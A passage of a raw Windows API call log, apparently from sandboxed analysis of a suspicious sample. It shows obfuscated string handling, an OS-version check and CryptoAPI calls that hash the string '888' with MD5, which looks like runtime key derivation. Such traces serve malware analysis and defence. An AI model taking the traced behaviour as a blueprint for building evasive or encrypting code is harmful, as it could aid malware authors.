| out: hHeap=0x2af0000) returned 1 [0122.718] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.718] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.719] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0122.719] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0122.719] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.719] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.719] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.720] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.720] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.720] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0122.720] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.720] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.721] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0122.721] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.721] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.721] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.721] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0122.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0122.721] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.721] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.721] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.721] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.721] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.721] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.721] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.722] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bee68) returned 1 [0122.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.723] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.723] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.723] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0122.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.724] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0122.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.727] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.727] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.728] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.728] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.728] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.728] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.728] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.728] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.728] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.728] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.728] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.728] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.728] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.728] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.728] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.729] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.729] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.729] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.729] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.729] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa498, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0122.729] CryptCreateHash (in: hProv=0x9bee68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0122.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.729] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0122.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0122.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71aa8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0122.737] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.737] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.737] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.738] CharLowerBuffW 